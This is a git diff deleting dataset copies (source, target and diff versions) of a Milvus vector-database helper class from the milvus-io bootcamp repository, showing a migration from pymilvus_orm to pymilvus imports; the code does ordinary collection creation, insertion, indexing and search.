- dim=VECTOR_DIMENSION, is_primary=False) - schema = CollectionSchema(fields=[field1, field2], description="collection description") - self.collection = Collection(name=collection_name, schema=schema) - LOGGER.debug("Create Milvus collection: {}".format(self.collection)) - return "OK" - else: - self.collection = Collection(collection_name) - return "collection {} exists".format(collection_name) - except Exception as e: - LOGGER.error("Failed to load data to Milvus: {}".format(e)) - sys.exit(1) - - # Batch insert vectors to milvus collection - def insert(self, collection_name, vectors, ids=None): - try: - self.create_collection(collection_name) - # data = [vectors] - self.collection.insert([ids, vectors]) - # vids = mr.primary_keys - # self.collection.load() - LOGGER.debug( - "Insert vectors to Milvus in collection: {} with {} rows".format(collection_name, len(vectors))) - return ids - except Exception as e: - LOGGER.error("Failed to load data to Milvus: {}".format(e)) - sys.exit(1) - - # Create IVF_FLAT index on milvus collection - def create_index(self, collection_name, index_params): - try: - self.set_collection(collection_name) - status = self.collection.create_index(field_name="embedding", index_params=index_params) - if not status.code: - self.collection.load() - LOGGER.debug( - "Successfully create index in collection:{} with param:{}".format(collection_name, index_params)) - return status - else: - raise Exception(status.message) - except Exception as e: - LOGGER.error("Failed to create index: {}".format(e)) - sys.exit(1) - - # get index info - def get_index_params(self, collection_name): - self.set_collection(collection_name) - return [index.params for index in self.collection.indexes] - - # Delete Milvus collection - def delete_collection(self, collection_name): - try: - self.set_collection(collection_name) - self.collection.drop() - LOGGER.debug("Successfully drop collection!") - return "ok" - except Exception as e: - LOGGER.error("Failed to drop collection: {}".format(e)) - sys.exit(1) - - # Search vector in milvus collection - def search_vectors(self, collection_name, vectors, top_k, search_params): - try: - self.set_collection(collection_name) - # search_params = {"metric_type": METRIC_TYPE, "params": {"nprobe": nprobe}} - # data = [vectors] - res = self.collection.search(vectors, anns_field="embedding", param=search_params, limit=top_k) - LOGGER.debug("Successfully search in collection: {}".format(res)) - return res - except Exception as e: - LOGGER.error("Failed to search vectors in Milvus: {}".format(e)) - sys.exit(1) - - # Get the number of milvus collection - def count(self, collection_name): - try: - self.set_collection(collection_name) - num = self.collection.num_entities - LOGGER.debug("Successfully get the num:{} of the collection:{}".format(num, collection_name)) - return num - except Exception as e: - LOGGER.error("Failed to count vectors in Milvus: {}".format(e)) - sys.exit(1) - - def create_partition(self, collection_name, partition_name): - self.set_collection(collection_name) - if self.collection.has_partition(partition_name): - return "This partition {} exists".format(partition_name) - else: - partition = self.collection.create_partition(partition_name) - return partition - - def delete_index(self, collection_name): - self.set_collection(collection_name) - self.collection.drop_index() - - def load_data(self, collection_name): - self.set_collection(collection_name) - self.collection.load() - - def show_collection(self): - return utility.list_collections() - - def get_loading_progress(self, collection_name): - return utility.loading_progress(collection_name) - - def get_index_progress(self, collection_name): - return utility.index_building_progress(collection_name) - - def release_mem(self, collection_name): - self.set_collection(collection_name) - return self.collection.release() diff --git a/v1/data/codefile/milvus-io@bootcamp__89c7afc__benchmark_test$scripts$milvus_helpers.py.target.py b/v1/data/codefile/milvus-io@bootcamp__89c7afc__benchmark_test$scripts$milvus_helpers.py.target.py deleted file mode 100644 index 20fadaf..0000000 --- a/v1/data/codefile/milvus-io@bootcamp__89c7afc__benchmark_test$scripts$milvus_helpers.py.target.py +++ /dev/null @@ -1,165 +0,0 @@ -import sys -from pymilvus import connections, FieldSchema, CollectionSchema, DataType, Collection, utility - -from config import MILVUS_HOST, MILVUS_PORT, VECTOR_DIMENSION, METRIC_TYPE, NLIST -from logs import LOGGER - - -class MilvusHelper: - def __init__(self): - try: - self.collection = None - connections.connect(host=MILVUS_HOST, port=MILVUS_PORT) - LOGGER.debug("Successfully connect to Milvus with IP:{} and PORT:{}".format(MILVUS_HOST, MILVUS_PORT)) - except Exception as e: - LOGGER.error("Failed to connect Milvus: {}".format(e)) - sys.exit(1) - - def set_collection(self, collection_name): - try: - if self.has_collection(collection_name): - self.collection = Collection(name=collection_name) - else: - raise Exception("There has no collection named:{}".format(collection_name)) - except Exception as e: - LOGGER.error("ERROR: {}".format(e)) - sys.exit(1) - - # Return if Milvus has the collection - def has_collection(self, collection_name): - try: - return utility.has_collection(collection_name) - except Exception as e: - LOGGER.error("Failed to load data to Milvus: {}".format(e)) - sys.exit(1) - - # Create milvus collection if not exists - def create_collection(self, collection_name): - try: - if not self.has_collection(collection_name): - field1 = FieldSchema(name="id", dtype=DataType.INT64, descrition="int64", is_primary=True, - auto_id=False) - field2 = FieldSchema(name="embedding", dtype=DataType.FLOAT_VECTOR, descrition="float vector", - dim=VECTOR_DIMENSION, is_primary=False) - schema = CollectionSchema(fields=[field1, field2], description="collection description") - self.collection = Collection(name=collection_name, schema=schema) - LOGGER.debug("Create Milvus collection: {}".format(self.collection)) - return "OK" - else: - self.collection = Collection(collection_name) - return "collection {} exists".format(collection_name) - except Exception as e: - LOGGER.error("Failed to load data to Milvus: {}".format(e)) - sys.exit(1) - - # Batch insert vectors to milvus collection - def insert(self, collection_name, vectors, ids=None): - try: - self.create_collection(collection_name) - # data = [vectors] - self.collection.insert([ids, vectors]) - # vids = mr.primary_keys - # self.collection.load() - LOGGER.debug( - "Insert vectors to Milvus in collection: {} with {} rows".format(collection_name, len(vectors))) - return ids - except Exception as e: - LOGGER.error("Failed to load data to Milvus: {}".format(e)) - sys.exit(1) - - # Create IVF_FLAT index on milvus collection - def create_index(self, collection_name, index_params): - try: - self.set_collection(collection_name) - status = self.collection.create_index(field_name="embedding", index_params=index_params) - if not status.code: - self.collection.load() - LOGGER.debug( - "Successfully create index in collection:{} with param:{}".format(collection_name, index_params)) - return status - else: - raise Exception(status.message) - except Exception as e: - LOGGER.error("Failed to create index: {}".format(e)) - sys.exit(1) - - # get index info - def get_index_params(self, collection_name): - self.set_collection(collection_name) - return [index.params for index in self.collection.indexes] - - # Delete Milvus collection - def delete_collection(self, collection_name): - try: - # self.set_collection(collection_name) - # self.collection.drop() - utility.drop_collection(collection_name) - LOGGER.debug("Successfully drop collection!") - return "ok" - except Exception as e: - LOGGER.error("Failed to drop collection: {}".format(e)) - sys.exit(1) - - # Search vector in milvus collection - def search_vectors(self, collection_name, vectors, top_k, search_params): - try: - self.set_collection(collection_name) - # search_params = {"metric_type": METRIC_TYPE, "params": {"nprobe": nprobe}} - # data = [vectors] - res = self.collection.search(vectors, anns_field="embedding", param=search_params, limit=top_k) - LOGGER.debug("Successfully search in collection: {}".format(res)) - return res - except Exception as e: - LOGGER.error("Failed to search vectors in Milvus: {}".format(e)) - sys.exit(1) - - # Get the number of milvus collection - def count(self, collection_name): - try: - self.set_collection(collection_name) - num = self.collection.num_entities - LOGGER.debug("Successfully get the num:{} of the collection:{}".format(num, collection_name)) - return num - except Exception as e: - LOGGER.error("Failed to count vectors in Milvus: {}".format(e)) - sys.exit(1) - - # create a partition for Milvus - def create_partition(self, collection_name, partition_name): - self.set_collection(collection_name) - if self.collection.has_partition(partition_name): - return "This partition {} exists".format(partition_name) - else: - partition = self.collection.create_partition(partition_name) - return partition - - # drop index - def delete_index(self, collection_name): - self.set_collection(collection_name) - self.collection.drop_index() - - # load data from disk to memory - def load_data(self, collection_name): - self.set_collection(collection_name) - self.collection.load() - - # List all collections. - def list_collection(self): - return utility.list_collections() - - # Query the progress of loading. - def get_loading_progress(self, collection_name): - return utility.loading_progress(collection_name) - - # Query the progress of index building. - def get_index_progress(self, collection_name): - return utility.index_building_progress(collection_name) - - # release collection data from memory - def release_data(self, collection_name): - self.set_collection(collection_name) - return self.collection.release() - - # Calculate distance between two vector arrays. - def calculate_distance(self, vectors_left, vectors_right): - return utility.calc_distance(vectors_left, vectors_right) diff --git a/v1/data/codefile/milvus-io@bootcamp__a7f4c3f__solutions$question_answering_system$quick_deploy$server$src$milvus_helpers.py.diff b/v1/data/codefile/milvus-io@bootcamp__a7f4c3f__solutions$question_answering_system$quick_deploy$server$src$milvus_helpers.py.diff deleted file mode 100644 index e268787..0000000 --- a/v1/data/codefile/milvus-io@bootcamp__a7f4c3f__solutions$question_answering_system$quick_deploy$server$src$milvus_helpers.py.diff +++ /dev/null @@ -1,57 +0,0 @@ -diff --git a/solutions/question_answering_system/quick_deploy/server/src/milvus_helpers.py b/solutions/question_answering_system/quick_deploy/server/src/milvus_helpers.py - index 89c7afc6548362e9bbf1dbf6142aabb02bc3bb93..a7f4c3f13e007116d88d9a2776f471a4e4f1fc81 100644 - --- a/solutions/question_answering_system/quick_deploy/server/src/milvus_helpers.py - +++ b/solutions/question_answering_system/quick_deploy/server/src/milvus_helpers.py -@@ -1,13 +1,11 @@ - import sys --from pymilvus_orm import connections --from pymilvus_orm.types import DataType --from pymilvus_orm.schema import FieldSchema, CollectionSchema --from pymilvus_orm.collection import Collection -+from pymilvus import connections, FieldSchema, CollectionSchema, DataType, Collection, utility -+ - from config import MILVUS_HOST, MILVUS_PORT, VECTOR_DIMENSION, METRIC_TYPE --from pymilvus_orm import utility - from logs import LOGGER - - -+ - class MilvusHelper: - def __init__(self): - try: -@@ -25,7 +23,7 @@ def set_collection(self, collection_name): - else: - raise Exception("There has no collection named:{}".format(collection_name)) - except Exception as e: -- LOGGER.error("Failed to load data to Milvus: {}".format(e)) -+ LOGGER.error("ERROR: {}".format(e)) - sys.exit(1) - - # Return if Milvus has the collection -@@ -33,7 +31,7 @@ def has_collection(self, collection_name): - try: - return utility.has_collection(collection_name) - except Exception as e: -- LOGGER.error("Failed to load data to Milvus: {}".format(e)) -+ LOGGER.error("Failed: {}".format(e)) - sys.exit(1) - - # Create milvus collection if not exists -@@ -46,6 +44,8 @@ def create_collection(self, collection_name): - schema = CollectionSchema(fields=[field1, field2], description="collection description") - self.collection = Collection(name=collection_name, schema=schema) - LOGGER.debug("Create Milvus collection: {}".format(self.collection)) -+ else: -+ self.collection = Collection(name=collection_name) - return "OK" - except Exception as e: - LOGGER.error("Failed to load data to Milvus: {}".format(e)) -@@ -55,7 +55,7 @@ def create_collection(self, collection_name): - def insert(self, collection_name, vectors): - try: - self.create_collection(collection_name) -- self.collection = Collection(name=collection_name) -+ # self.collection = Collection(name=collection_name) - data = [vectors] - mr = self.collection.insert(data) - ids = mr.primary_keys diff --git a/v1/data/codefile/milvus-io@bootcamp__a7f4c3f__solutions$question_answering_system$quick_deploy$server$src$milvus_helpers.py.source.py b/v1/data/codefile/milvus-io@bootcamp__a7f4c3f__solutions$question_answering_system$quick_deploy$server$src$milvus_helpers.py.source.py deleted file mode 100644 index 133734a..0000000 --- a/v1/data/codefile/milvus-io@bootcamp__a7f4c3f__solutions$question_answering_system$quick_deploy$server$src$milvus_helpers.py.source.py +++ /dev/null @@ -1,119 +0,0 @@ -import sys -from pymilvus_orm import connections -from pymilvus_orm.types import DataType -from pymilvus_orm.schema import FieldSchema, CollectionSchema -from pymilvus_orm.collection import Collection -from config import MILVUS_HOST, MILVUS_PORT, VECTOR_DIMENSION, METRIC_TYPE -from pymilvus_orm import utility -from logs import LOGGER - - -class MilvusHelper: - def __init__(self): - try: - self.collection = None - connections.connect(host=MILVUS_HOST, port=MILVUS_PORT) - LOGGER.debug("Successfully connect to Milvus with IP:{} and PORT:{}".format(MILVUS_HOST, MILVUS_PORT)) - except Exception as e: - LOGGER.error("Failed to connect Milvus: {}".format(e)) - sys.exit(1) - - def set_collection(self, collection_name): - try: - if self.has_collection(collection_name): - self.collection = Collection(name=collection_name) - else: - raise Exception("There has no collection named:{}".format(collection_name)) - except Exception as e: - LOGGER.error("Failed to load data to Milvus: {}".format(e)) - sys.exit(1) - - # Return if Milvus has the collection - def has_collection(self, collection_name): - try: - return utility.has_collection(collection_name) - except Exception as e: - LOGGER.error("Failed to load data to Milvus: {}".format(e)) - sys.exit(1) - - # Create milvus collection if not exists - def create_collection(self, collection_name): - try: - if not self.has_collection(collection_name): - field1 = FieldSchema(name="id", dtype=DataType.INT64, descrition="int64", is_primary=True, auto_id=True) - field2 = FieldSchema(name="embedding", dtype=DataType.FLOAT_VECTOR, descrition="float vector", - dim=VECTOR_DIMENSION, is_primary=False) - schema = CollectionSchema(fields=[field1, field2], description="collection description") - self.collection = Collection(name=collection_name, schema=schema) - LOGGER.debug("Create Milvus collection: {}".format(self.collection)) - return "OK" - except Exception as e: - LOGGER.error("Failed to load data to Milvus: {}".format(e)) - sys.exit(1) - - # Batch insert vectors to milvus collection - def insert(self, collection_name, vectors): - try: - self.create_collection(collection_name) - self.collection = Collection(name=collection_name) - data = [vectors] - mr = self.collection.insert(data) - ids = mr.primary_keys - self.collection.load() - LOGGER.debug( - "Insert vectors to Milvus in collection: {} with {} rows".format(collection_name, len(vectors))) - return ids - except Exception as e: - LOGGER.error("Failed to load data to Milvus: {}".format(e)) - sys.exit(1) - - # Create IVF_FLAT index on milvus collection - def create_index(self, collection_name): - try: - self.set_collection(collection_name) - default_index = {"index_type": "IVF_SQ8", "metric_type": METRIC_TYPE, "params": {"nlist": 16384}} - status = self.collection.create_index(field_name="embedding", index_params=default_index) - if not status.code: - LOGGER.debug( - "Successfully create index in collection:{} with param:{}".format(collection_name, default_index)) - return status - else: - raise Exception(status.message) - except Exception as e: - LOGGER.error("Failed to create index: {}".format(e)) - sys.exit(1) - - # Delete Milvus collection - def delete_collection(self, collection_name): - try: - self.set_collection(collection_name) - self.collection.drop() - LOGGER.debug("Successfully drop collection!") - return "Successfully drop table" - except Exception as e: - LOGGER.error("Failed to drop collection: {}".format(e)) - sys.exit(1) - - # Search vector in milvus collection - def search_vectors(self, collection_name, vectors, top_k): - try: - self.set_collection(collection_name) - search_params = {"metric_type": METRIC_TYPE, "params": {"nprobe": 16}} - # data = [vectors] - res = self.collection.search(vectors, anns_field="embedding", param=search_params, limit=top_k) - LOGGER.debug("Successfully search in collection: {}".format(res)) - return res - except Exception as e: - LOGGER.error("Failed to search vectors in Milvus: {}".format(e)) - sys.exit(1) - - # Get the number of milvus collection - def count(self, collection_name): - try: - self.set_collection(collection_name) - num = self.collection.num_entities - LOGGER.debug("Successfully get the num:{} of the collection:{}".format(num, collection_name)) - return num - except Exception as e: - LOGGER.error("Failed to count vectors in Milvus: {}".format(e)) - sys.exit(1) diff --git a/v1/data/codefile/milvus-io@bootcamp__a7f4c3f__solutions$question_answering_system$quick_deploy$server$src$milvus_helpers.py.target.py b/v1/data/codefile/milvus-io@bootcamp__a7f4c3f__solutions$question_answering_system$quick_deploy$server$src$milvus_helpers.py.target.py deleted file mode 100644 index 466d947..0000000 --- a/v1/data/codefile/milvus-io@bootcamp__a7f4c3f__solutions$question_answering_system$quick_deploy$server$src$milvus_helpers.py.target.py +++ /dev/null @@ -1,119 +0,0 @@ -import sys -from pymilvus import connections, FieldSchema, CollectionSchema, DataType, Collection, utility - -from config import MILVUS_HOST, MILVUS_PORT, VECTOR_DIMENSION, METRIC_TYPE -from logs import LOGGER - - - -class MilvusHelper: - def __init__(self): - try: - self.collection = None - connections.connect(host=MILVUS_HOST, port=MILVUS_PORT) - LOGGER.debug("Successfully connect to Milvus with IP:{} and PORT:{}".format(MILVUS_HOST, MILVUS_PORT)) - except Exception as e: - LOGGER.error("Failed to connect Milvus: {}".format(e)) - sys.exit(1) - - def set_collection(self, collection_name): - try: - if self.has_collection(collection_name): - self.collection = Collection(name=collection_name) - else: - raise Exception("There has no collection named:{}".format(collection_name)) - except Exception as e: - LOGGER.error("ERROR: {}".format(e)) - sys.exit(1) - - # Return if Milvus has the collection - def has_collection(self, collection_name): - try: - return utility.has_collection(collection_name) - except Exception as e: - LOGGER.error("Failed: {}".format(e)) - sys.exit(1) - - # Create milvus collection if not exists - def create_collection(self, collection_name): - try: - if not self.has_collection(collection_name): - field1 = FieldSchema(name="id", dtype=DataType.INT64, descrition="int64", is_primary=True, auto_id=True) - field2 = FieldSchema(name="embedding", dtype=DataType.FLOAT_VECTOR, descrition="float vector", - dim=VECTOR_DIMENSION, is_primary=False) - schema = CollectionSchema(fields=[field1, field2], description="collection description") - self.collection = Collection(name=collection_name, schema=schema) - LOGGER.debug("Create Milvus collection: {}".format(self.collection)) - else: - self.collection = Collection(name=collection_name) - return "OK" - except Exception as e: - LOGGER.error("Failed to load data to Milvus: {}".format(e)) - sys.exit(1) - - # Batch insert vectors to milvus collection - def insert(self, collection_name, vectors): - try: - self.create_collection(collection_name) - # self.collection = Collection(name=collection_name) - data = [vectors] - mr = self.collection.insert(data) - ids = mr.primary_keys - self.collection.load() - LOGGER.debug( - "Insert vectors to Milvus in collection: {} with {} rows".format(collection_name, len(vectors))) - return ids - except Exception as e: - LOGGER.error("Failed to load data to Milvus: {}".format(e)) - sys.exit(1) - - # Create IVF_FLAT index on milvus collection - def create_index(self, collection_name): - try: - self.set_collection(collection_name) - default_index = {"index_type": "IVF_SQ8", "metric_type": METRIC_TYPE, "params": {"nlist": 16384}} - status = self.collection.create_index(field_name="embedding", index_params=default_index) - if not status.code: - LOGGER.debug( - "Successfully create index in collection:{} with param:{}".format(collection_name, default_index)) - return status - else: - raise Exception(status.message) - except Exception as e: - LOGGER.error("Failed to create index: {}".format(e)) - sys.exit(1) - - # Delete Milvus collection - def delete_collection(self, collection_name): - try: - self.set_collection(collection_name) - self.collection.drop() - LOGGER.debug("Successfully drop collection!") - return "Successfully drop table" - except Exception as e: - LOGGER.error("Failed to drop collection: {}".format(e)) - sys.exit(1) - - # Search vector in milvus collection - def search_vectors(self, collection_name, vectors, top_k): - try: - self.set_collection(collection_name) - search_params = {"metric_type": METRIC_TYPE, "params": {"nprobe": 16}} - # data = [vectors] - res = self.collection.search(vectors, anns_field="embedding", param=search_params, limit=top_k) - LOGGER.debug("Successfully search in collection: {}".format(res)) - return res - except Exception as e: - LOGGER.error("Failed to search vectors in Milvus: {}".format(e)) - sys.exit(1) - - # Get the number of milvus collection - def count(self, collection_name): - try: - self.set_collection(collection_name) - num = self.collection.num_entities - LOGGER.debug("Successfully get the num:{} of the collection:{}".format(num, collection_name)) - return num - except Exception as e: - LOGGER.error("Failed to count vectors in Milvus: {}".format(e)) - sys.exit(1) diff --git a/v1/data/codefile/milvus-io@bootcamp__e5073e4__solutions$video_similarity_search$object_detection$server$src$milvus_helpers.py.diff b/v1/data/codefile/milvus-io@bootcamp__e5073e4__solutions$video_similarity_search$object_detection$server$src$milvus_helpers.py.diff deleted file mode 100644 index 1b60863..0000000 --- a/v1/data/codefile/milvus-io@bootcamp__e5073e4__solutions$video_similarity_search$object_detection$server$src$milvus_helpers.py.diff +++ /dev/null @@ -1,16 +0,0 @@ -diff --git a/solutions/video_similarity_search/object_detection/server/src/milvus_helpers.py b/solutions/video_similarity_search/object_detection/server/src/milvus_helpers.py - index e033ec5f1ec0c44da782e82c8f9624bca63a299a..e5073e4c0c3e799822e939268d80c8f0601ea4cf 100644 - --- a/solutions/video_similarity_search/object_detection/server/src/milvus_helpers.py - +++ b/solutions/video_similarity_search/object_detection/server/src/milvus_helpers.py -@@ -1,10 +1,6 @@ - import sys --from pymilvus_orm import connections --from pymilvus_orm.types import DataType --from pymilvus_orm.schema import FieldSchema, CollectionSchema --from pymilvus_orm.collection import Collection - from config import MILVUS_HOST, MILVUS_PORT, VECTOR_DIMENSION, METRIC_TYPE, TOP_K --from pymilvus_orm import utility -+from pymilvus import connections, FieldSchema, CollectionSchema, DataType, Collection, utility - from logs import LOGGER - - diff --git a/v1/data/codefile/milvus-io@bootcamp__e5073e4__solutions$video_similarity_search$object_detection$server$src$milvus_helpers.py.source.py b/v1/data/codefile/milvus-io@bootcamp__e5073e4__solutions$video_similarity_search$object_detection$server$src$milvus_helpers.py.source.py deleted file mode 100644 index a9755c3..0000000 --- a/v1/data/codefile/milvus-io@bootcamp__e5073e4__solutions$video_similarity_search$object_detection$server$src$milvus_helpers.py.source.py +++ /dev/null @@ -1,119 +0,0 @@ -import sys -from pymilvus_orm import connections -from pymilvus_orm.types import DataType -from pymilvus_orm.schema import FieldSchema, CollectionSchema -from pymilvus_orm.collection import Collection -from config import MILVUS_HOST, MILVUS_PORT, VECTOR_DIMENSION, METRIC_TYPE, TOP_K -from pymilvus_orm import utility -from logs import LOGGER - - -class MilvusHelper: - def __init__(self): - try: - self.collection = None - connections.connect(host=MILVUS_HOST, port=MILVUS_PORT) - LOGGER.debug("Successfully connect to Milvus with IP:{} and PORT:{}".format(MILVUS_HOST, MILVUS_PORT)) - except Exception as e: - LOGGER.error("Failed to connect Milvus: {}".format(e)) - sys.exit(1) - - def set_collection(self, collection_name): - try: - if self.has_collection(collection_name): - self.collection = Collection(name=collection_name) - else: - raise Exception("There has no collection named:{}".format(collection_name)) - except Exception as e: - LOGGER.error("Failed to load data to Milvus: {}".format(e)) - sys.exit(1) - - # Return if Milvus has the collection - def has_collection(self, collection_name): - try: - return utility.has_collection(collection_name) - except Exception as e: - LOGGER.error("Failed to load data to Milvus: {}".format(e)) - sys.exit(1) - - # Create milvus collection if not exists - def create_collection(self, collection_name): - try: - if not self.has_collection(collection_name): - field1 = FieldSchema(name="id", dtype=DataType.INT64, descrition="int64", is_primary=True, auto_id=True) - field2 = FieldSchema(name="embedding", dtype=DataType.FLOAT_VECTOR, descrition="float vector", - dim=VECTOR_DIMENSION, is_primary=False) - schema = CollectionSchema(fields=[field1, field2], description="collection description") - self.collection = Collection(name=collection_name, schema=schema) - LOGGER.debug("Create Milvus collection: {}".format(self.collection)) - return "OK" - except Exception as e: - LOGGER.error("Failed to load data to Milvus: {}".format(e)) - sys.exit(1) - - # Batch insert vectors to milvus collection - def insert(self, collection_name, vectors): - try: - self.create_collection(collection_name) - data = [vectors] - mr = self.collection.insert(data) - ids = mr.primary_keys - self.collection.load() - LOGGER.debug( - "Insert vectors to Milvus in collection: {} with {} rows".format(collection_name, len(vectors))) - return ids - except Exception as e: - LOGGER.error("Failed to load data to Milvus: {}".format(e)) - sys.exit(1) - - # Create IVF_FLAT index on milvus collection - def create_index(self, collection_name): - try: - self.set_collection(collection_name) - default_index = {"index_type": "IVF_SQ8", "metric_type": METRIC_TYPE, "params": {"nlist": 16384}} - status = self.collection.create_index(field_name="embedding", index_params=default_index) - if not status.code: - LOGGER.debug( - "Successfully create index in collection:{} with param:{}".format(collection_name, default_index)) - return status - else: - raise Exception(status.message) - except Exception as e: - LOGGER.error("Failed to create index: {}".format(e)) - sys.exit(1) - - # Delete Milvus collection - def delete_collection(self, collection_name): - try: - self.set_collection(collection_name) - self.collection.drop() - LOGGER.debug("Successfully drop collection!") - return "ok" - except Exception as e: - LOGGER.error("Failed to drop collection: {}".format(e)) - sys.exit(1) - - # Search vector in milvus collection - def search_vectors(self, collection_name, vectors, top_k): - try: - self.set_collection(collection_name) - search_params = {"metric_type": METRIC_TYPE, "params": {"nprobe": 16}} - # data = [vectors] - res = self.collection.search(vectors, anns_field="embedding", param=search_params, limit=top_k) - print(res[0]) - LOGGER.debug("Successfully search in collection: {}".format(res)) - return res - except Exception as e: - LOGGER.error("Failed to search vectors in Milvus: {}".format(e)) - sys.exit(1) - - # Get the number of milvus collection - def count(self, collection_name): - try: - self.set_collection(collection_name) - num = self.collection.num_entities - LOGGER.debug("Successfully get the num:{} of the collection:{}".format(num, collection_name)) - return num - except Exception as e: - LOGGER.error("Failed to count vectors in Milvus: {}".format(e)) - sys.exit(1) diff --git a/v1/data/codefile/milvus-io@bootcamp__e5073e4__solutions$video_similarity_search$object_detection$server$src$milvus_helpers.py.target.py b/v1/data/codefile/milvus-io@bootcamp__e5073e4__solutions$video_similarity_search$object_detection$server$src$milvus_helpers.py.target.py deleted file mode 100644 index f511b1d..0000000 --- a/v1/data/codefile/milvus-io@bootcamp__e5073e4__solutions$video_similarity_search$object_detection$server$src$milvus_helpers.py.target.py +++ /dev/null @@ -1,115 +0,0 @@ -import sys -from config import MILVUS_HOST, MILVUS_PORT, VECTOR_DIMENSION, METRIC_TYPE, TOP_K -from pymilvus import connections, FieldSchema, CollectionSchema, DataType, Collection, utility -from logs import LOGGER - - -class MilvusHelper: - def __init__(self): - try: - self.collection = None - connections.connect(host=MILVUS_HOST, port=MILVUS_PORT) - LOGGER.debug("Successfully connect to Milvus with IP:{} and PORT:{}".format(MILVUS_HOST, MILVUS_PORT)) - except Exception as e: - LOGGER.error("Failed to connect Milvus: {}".format(e)) - sys.exit(1) - - def set_collection(self, collection_name): - try: - if self.has_collection(collection_name): - self.collection = Collection(name=collection_name) - else: - raise Exception("There has no collection named:{}".format(collection_name)) - except Exception as e: - LOGGER.error("Failed to load data to Milvus: {}".format(e)) - sys.exit(1) - - # Return if Milvus has the collection - def has_collection(self, collection_name): - try: - return utility.has_collection(collection_name) - except Exception as e: - LOGGER.error("Failed to load data to Milvus: {}".format(e)) - sys.exit(1) - - # Create milvus collection if not exists - def create_collection(self, collection_name): - try: - if not self.has_collection(collection_name): - field1 = FieldSchema(name="id", dtype=DataType.INT64, descrition="int64", is_primary=True, auto_id=True) - field2 = FieldSchema(name="embedding", dtype=DataType.FLOAT_VECTOR, descrition="float vector", - dim=VECTOR_DIMENSION, is_primary=False) - schema = CollectionSchema(fields=[field1, field2], description="collection description") - self.collection = Collection(name=collection_name, schema=schema) - LOGGER.debug("Create Milvus collection: {}".format(self.collection)) - return "OK" - except Exception as e: - LOGGER.error("Failed to load data to Milvus: {}".format(e)) - sys.exit(1) - - # Batch insert vectors to milvus collection - def insert(self, collection_name, vectors): - try: - self.create_collection(collection_name) - data = [vectors] - mr = self.collection.insert(data) - ids = mr.primary_keys - self.collection.load() - LOGGER.debug( - "Insert vectors to Milvus in collection: {} with {} rows".format(collection_name, len(vectors))) - return ids - except Exception as e: - LOGGER.error("Failed to load data to Milvus: {}".format(e)) - sys.exit(1) - - # Create IVF_FLAT index on milvus collection - def create_index(self, collection_name): - try: - self.set_collection(collection_name) - default_index = {"index_type": "IVF_SQ8", "metric_type": METRIC_TYPE, "params": {"nlist": 16384}} - status = self.collection.create_index(field_name="embedding", index_params=default_index) - if not status.code: - LOGGER.debug( - "Successfully create index in collection:{} with param:{}".format(collection_name, default_index)) - return status - else: - raise Exception(status.message) - except Exception as e: - LOGGER.error("Failed to create index: {}".format(e)) - sys.exit(1) - - # Delete Milvus collection - def delete_collection(self, collection_name): - try: - self.set_collection(collection_name) - self.collection.drop() - LOGGER.debug("Successfully drop collection!") - return "ok" - except Exception as e: - LOGGER.error("Failed to drop collection: {}".format(e)) - sys.exit(1) - - # Search vector in milvus collection - def search_vectors(self, collection_name, vectors, top_k): - try: - self.set_collection(collection_name) - search_params = {"metric_type": METRIC_TYPE, "params": {"nprobe": 16}} - # data = [vectors] - res = self.collection.search(vectors, anns_field="embedding", param=search_params, limit=top_k) - print(res[0]) - LOGGER.debug("Successfully search in collection: {}".format(res)) - return res - except Exception as e: - LOGGER.error("Failed to search vectors in Milvus: {}".format(e)) - sys.exit(1) - - # Get the number of milvus collection - def count(self, collection_name): - try: - self.set_collection(collection_name) - num = self.collection.num_entities - LOGGER.debug("Successfully get the num:{} of the collection:{}".format(num, collection_name)) - return num - except Exception as e: - LOGGER.error("Failed to count vectors in Milvus: {}".format(e)) - sys.exit(1) diff --git a/v1/data/codefile/milvus-io@bootcamp__e5073e4__solutions$video_similarity_search$quick_deploy$server$src$milvus_helpers.py.diff b/v1/data/codefile/milvus-io@bootcamp__e5073e4__solutions$video_similarity_search$quick_deploy$server$src$milvus_helpers.py.diff deleted file mode 100644 index 333f4dc..0000000 --- a/v1/data/codefile/milvus-io@bootcamp__e5073e4__solutions$video_similarity_search$quick_deploy$server$src$milvus_helpers.py.diff +++ /dev/null @@ -1,16 +0,0 @@ -diff --git a/solutions/video_similarity_search/quick_deploy/server/src/milvus_helpers.py b/solutions/video_similarity_search/quick_deploy/server/src/milvus_helpers.py - index e033ec5f1ec0c44da782e82c8f9624bca63a299a..e5073e4c0c3e799822e939268d80c8f0601ea4cf 100644 - --- a/solutions/video_similarity_search/quick_deploy/server/src/milvus_helpers.py - +++ b/solutions/video_similarity_search/quick_deploy/server/src/milvus_helpers.py -@@ -1,10 +1,6 @@ - import sys --from pymilvus_orm import connections --from pymilvus_orm.types import DataType --from pymilvus_orm.schema import FieldSchema, CollectionSchema --from pymilvus_orm.collection import Collection - from config import MILVUS_HOST, MILVUS_PORT, VECTOR_DIMENSION, METRIC_TYPE --from pymilvus_orm import utility -+from pymilvus import connections, FieldSchema, CollectionSchema, DataType, Collection, utility - from logs import LOGGER - - diff --git a/v1/data/codefile/milvus-io@bootcamp__e5073e4__solutions$video_similarity_search$quick_deploy$server$src$milvus_helpers.py.source.py b/v1/data/codefile/milvus-io@bootcamp__e5073e4__solutions$video_similarity_search$quick_deploy$server$src$milvus_helpers.py.source.py deleted file mode 100644 index 1edea49..0000000 --- a/v1/data/codefile/milvus-io@bootcamp__e5073e4__solutions$video_similarity_search$quick_deploy$server$src$milvus_helpers.py.source.py +++ /dev/null @@ -1,121 +0,0 @@ -import sys -from pymilvus_orm import connections -from pymilvus_orm.types import DataType -from pymilvus_orm.schema import FieldSchema, CollectionSchema -from pymilvus_orm.collection import Collection -from config import MILVUS_HOST, MILVUS_PORT, VECTOR_DIMENSION, METRIC_TYPE -from pymilvus_orm import utility -from logs import LOGGER - - -class MilvusHelper: - def __init__(self): - try: - self.collection =None - connections.connect(host=MILVUS_HOST, port=MILVUS_PORT) - LOGGER.debug("Successfully connect to Milvus with IP:{} and PORT:{}".format(MILVUS_HOST, MILVUS_PORT)) - except Exception as e: - LOGGER.error("Failed to connect Milvus: {}".format(e)) - sys.exit(1) - - - def set_collection(self, collection_name): - try: - if self.has_collection(collection_name): - self.collection = Collection(name=collection_name) - else: - raise Exception("There has no collection named:{}".format(collection_name)) - except Exception as e: - LOGGER.error("Failed to load data to Milvus: {}".format(e)) - sys.exit(1) - - # Return if Milvus has the collection - def has_collection(self, collection_name): - try: - return utility.has_collection(collection_name) - except Exception as e: - LOGGER.error("Failed to load data to Milvus: {}".format(e)) - sys.exit(1) - - # Create milvus collection if not 